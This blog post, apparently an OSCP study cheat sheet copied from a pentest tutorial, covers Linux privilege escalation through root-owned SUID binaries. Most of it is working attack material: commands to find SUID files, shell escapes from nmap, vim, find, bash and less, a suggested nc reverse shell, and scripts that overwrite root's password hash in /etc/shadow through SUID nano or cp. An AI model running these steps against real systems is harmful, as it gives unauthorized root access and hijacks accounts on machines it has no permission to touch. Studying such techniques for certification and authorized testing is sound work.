Furrukh Taj

Infosec Enthusiast

Exploiting SUIDS for Privilege Escalation

08 Nov 2018 » hacking, security, privilege-escalation, oscp


Original Post: Pentest Lab


-- Another copy/paste, for my own reference, that I used for OSCP.
-- Known Linux executables that allow privilege escalation when they are installed with the SUID bit (owned by root) include:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp


-- Find files with the SUID bit set (any of the binaries above showing up here, owned by root, is a candidate for gaining root):

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
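As an added example (not part of the original post or the Pentest Lab article), the enumeration above wrapped in a small POSIX shell script that also flags any hit whose basename is on the known-exploitable list from the top of the post. The KNOWN list, the function names and the sample paths are assumptions of this example; run `enumerate_suid / | triage_suid` on a target to get only the interesting hits.

```shell
#!/bin/sh
# Added example: enumerate SUID files and flag the ones on the known-exploitable list.
# Not from the original post; KNOWN and the function names are this example's own.

# Basenames from the list at the top of the post (vim.tiny added, as Debian installs vim under that name).
KNOWN="nmap vim vim.tiny find bash more less nano cp"

# enumerate_suid DIR: print every regular file under DIR with the setuid bit set.
# -user root is deliberately omitted so SUID files owned by other accounts are listed too;
# stderr is discarded because unreadable directories are noise here, not findings.
enumerate_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# triage_suid: read paths on stdin, print those whose basename is in KNOWN.
triage_suid() {
    while IFS= read -r path; do
        name=${path##*/}
        for k in $KNOWN; do
            if [ "$name" = "$k" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Typical use on a target (constructed usage, not output from a real host):
#   enumerate_suid / | triage_suid
```

Anything `triage_suid` prints is worth checking with `ls -l` to confirm the owner is root; a SUID binary owned by an unprivileged account only gets you that account.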


nmap <= 5.21

nmap -V
nmap --interactive
nmap> !sh
sh-3.2# whoami
root


vim

vim.tiny


Press ESC key

:set shell=/bin/sh
:shell


find

touch me
find me -exec whoami \;
root

-- Now, to gain root access, either spawn a reverse shell with nc from the -exec, or update /etc/shadow with a password hash generated by openssl (or makepasswd):

openssl passwd -1 -salt xyz yourpass
makepasswd --clearfrom=- --crypt-md5 <<< YourPass

-- Put the hash printed above into the second (password) field of the root line in /etc/shadow, then su root with that password.


bash

-- Run it with -p: without that flag bash resets the effective UID to the real UID at startup and the SUID bit is wasted.

bash -p
bash-3.2# id


more & less

-- Open a file and spawn a shell from the pager prompt. With more, the file must be longer than one screen, otherwise it prints the file and exits without a prompt.

less /etc/passwd
!/bin/sh


nano
-- nano runs as root, so use it to open /etc/shadow directly and replace the root password hash with one generated as above.


cp
-- Copy the shadow file somewhere writable, put the generated hash into the root line of the copy, then copy it back over /etc/shadow (the SUID cp writes it as root) and su with the new password.

cp /etc/shadow /tmp/shadow
openssl passwd -1 -salt xyz  yourpass
vi /tmp/shadow
cp /tmp/shadow /etc/shadow
su root
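The shadow-editing step that the find, nano and cp sections all rely on, as an added example that is not from the original post: generate the hash with the same openssl command the post uses, swap it into the root line of a working copy with awk instead of editing by hand, and read the field back to confirm the edit before copying the file over /etc/shadow. The function names and the sample shadow lines are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post): rewrite root's hash in a copy of /etc/shadow.
# make_hash, set_root_hash and root_hash are names chosen for this example.

# make_hash PASSWORD: MD5-crypt hash, same command and salt as in the post.
make_hash() {
    openssl passwd -1 -salt xyz "$1"
}

# set_root_hash FILE HASH: replace the second (hash) field of the root line in FILE.
# Every other line is passed through unchanged, including the empty trailing fields.
set_root_hash() {
    file=$1
    hash=$2
    tmp="$file.new"
    awk -F: -v OFS=: -v h="$hash" '$1 == "root" { $2 = h } { print }' "$file" > "$tmp" \
        && mv "$tmp" "$file"
}

# root_hash FILE: print the hash field of the root line, to check the edit took.
root_hash() {
    awk -F: '$1 == "root" { print $2 }' "$1"
}

# Usage on a target where cp is SUID root (constructed, as in the cp section of the post):
#   cp /etc/shadow /tmp/shadow
#   set_root_hash /tmp/shadow "$(make_hash yourpass)"
#   root_hash /tmp/shadow            # should print $1$xyz$...
#   cp /tmp/shadow /etc/shadow       # the SUID cp writes it back as root
#   su root                          # password: yourpass
```

Passing the hash with `-v` is safe here because MD5-crypt output contains only `$`, `.`, `/` and alphanumerics, so awk's escape processing of `-v` values never touches it. Keep the original copy of shadow around so the file can be restored after the engagement.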